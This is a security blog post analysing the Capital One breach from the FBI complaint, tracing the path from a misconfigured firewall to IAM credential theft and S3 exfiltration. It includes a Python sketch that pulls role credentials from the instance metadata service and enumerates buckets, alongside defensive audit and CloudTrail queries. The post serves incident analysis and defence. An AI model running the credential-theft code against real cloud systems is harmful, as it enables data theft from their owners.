
What We Know About the Capital One Data Breach

Posted under: Research and Analysis

I’m not a fan of dissecting complex data breaches when we don’t have much information. In this case we know more than usual, thanks to the details in the criminal complaint filed by the FBI.

I want to be very clear that this post isn’t meant to blame anyone; we have only the most basic information on what happened. The only person worthy of blame here is the attacker.

As many people know, Capital One makes heavy use of Amazon Web Services. We know AWS was involved in the attack since the federal complaint specifically mentions S3. But this wasn’t a public S3 bucket.

Again, all from the filed complaint:

  • The attacker discovered a server (likely an instance, since it had an IAM role) with a misconfigured firewall. There was also likely a software vulnerability or credential exposure involved in actually compromising it.
  • The attacker compromised the server and pulled out the IAM role credentials. These are ephemeral credentials that allow AWS API calls. Role credentials are rotated automatically by AWS and are much more secure than static credentials. However, with persistent access to the server an attacker can obviously keep pulling fresh credentials as they rotate.
  • Those credentials (an IAM role with “WAF” in the title) allowed listing S3 buckets and read access to at least some of those buckets. This is how the attacker exfiltrated the files (there’s a rough sketch of these two steps in code after this list).
  • Some buckets (maybe even all) may have been encrypted, and a lot of the data within those files (which included credit card applications) was encrypted or tokenized. Still, the impact was pretty bad.
  • The attacker exfiltrated the data and then discussed it in Slack and on social media.
  • Someone in contact with the attacker saw that information, which included some attack details posted on GitHub, and reported it to Capital One through their reporting program.
  • Capital One immediately involved the FBI and very quickly closed the misconfigurations. They also started their own investigation.
  • They were able to determine exactly what happened very quickly, likely through CloudTrail logs, which contained the API calls issued by that IAM role from that server (those are really easy to filter). From there they could trace back the associated IP addresses. There are a lot of other details in the complaint on how they found the attacker, and it looks like Capital One did quite a bit of the investigation themselves.
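
The complaint doesn’t describe the attacker’s actual tooling, but the credential-theft and exfiltration steps described above can be sketched roughly as follows. This is a minimal illustration, not a recreation: it assumes the older IMDSv1 metadata service (no session token), and boto3/requests are just the most obvious way to show the flow.

    # Rough sketch of the two steps above: pull the instance's IAM role
    # credentials from the metadata service, then use them to enumerate and
    # read S3 buckets. Purely illustrative; not the attacker's actual code.
    import boto3
    import requests
    from botocore.exceptions import ClientError

    IMDS = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

    # Step 1: from (or through) the compromised server, grab the role name and
    # its ephemeral credentials. (IMDSv2 would require a session token first.)
    role_name = requests.get(IMDS).text.strip()
    creds = requests.get(IMDS + role_name).json()

    # Step 2: use those temporary credentials to list buckets and their contents.
    s3 = boto3.client(
        "s3",
        aws_access_key_id=creds["AccessKeyId"],
        aws_secret_access_key=creds["SecretAccessKey"],
        aws_session_token=creds["Token"],
    )

    for bucket in s3.list_buckets()["Buckets"]:
        name = bucket["Name"]
        try:
            for obj in s3.list_objects_v2(Bucket=name).get("Contents", []):
                print(name, obj["Key"])  # exfiltration would be get_object() calls
        except ClientError:
            pass  # the role only had read access to some of the buckets

Worth noting: ListBuckets shows up in CloudTrail by default, while the object-level calls only appear if S3 data events are enabled, which matters for the investigation described below.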

So a misconfigured firewall (security group?) > compromised instance > IAM role credential extraction > bucket enumeration > data exfiltration. Followed by a rapid response and public notification.
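
The “security group?” in that chain is my guess, not something the complaint states. If the guess is right, this is the kind of overly permissive ingress rule a basic audit script can flag. A minimal sketch using boto3; a real review would also cover network ACLs, the WAF configuration itself, and so on.

    # Minimal sketch: flag security groups with ingress rules open to the
    # whole internet. Assumes the "misconfigured firewall" was a security
    # group, which is speculation on my part.
    import boto3

    ec2 = boto3.client("ec2")

    for page in ec2.get_paginator("describe_security_groups").paginate():
        for sg in page["SecurityGroups"]:
            for rule in sg["IpPermissions"]:
                for ip_range in rule.get("IpRanges", []):
                    if ip_range.get("CidrIp") == "0.0.0.0/0":
                        print(
                            f"{sg['GroupId']} ({sg['GroupName']}): "
                            f"ports {rule.get('FromPort', 'all')}-{rule.get('ToPort', 'all')} "
                            "open to the world"
                        )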

As a side note, it appears the attacker may have been a former AWS employee, but nothing indicates that was a factor in the breach.

Some will say this was a failure of the cloud, but we saw breaches like this long before the cloud. If anything, the containment and investigation were likely far faster than would have been possible with traditional infrastructure. For example, Capital One didn’t need to worry about the attacker turning off local logging, since CloudTrail captures everything that touches the AWS APIs. Normally we hear about these incidents months or years later, but in this case we went from initial report to arrest and public disclosure in right around two weeks.
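
To make that last point concrete, here is roughly what pulling a role’s activity back out of CloudTrail looks like through the API. Again a sketch: the session name is invented, the 90-day event history only covers management events (object-level S3 reads need data event logging turned on), and an investigation at this scale would more likely query the delivered log files with something like Athena.

    # Rough sketch of filtering CloudTrail event history for everything a
    # specific role session did. The "Username" value is a made-up example.
    import json

    import boto3

    cloudtrail = boto3.client("cloudtrail")

    pages = cloudtrail.get_paginator("lookup_events").paginate(
        LookupAttributes=[
            {"AttributeKey": "Username", "AttributeValue": "example-waf-role-session"}
        ]
    )

    for page in pages:
        for event in page["Events"]:
            detail = json.loads(event["CloudTrailEvent"])
            # Event name, time, and source IP: the same fields you would use
            # to trace the activity back to the attacker's addresses.
            print(event["EventTime"], event["EventName"], detail.get("sourceIPAddress"))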

I hope that someday Capital One will be able to talk about the details publicly so the rest of us can learn. No matter how good you are, mistakes will happen. The hardest problem in security is solving the simple problems at scale. Because simple doesn’t scale, and what we do is really damn hard to get right all the time.

– Rich


*** This is a Security Bloggers Network syndicated blog from the Securosis Blog, authored by Securosis. Read the original post at: http://securosis.com/blog/what-we-know-about-the-capital-one-data-breach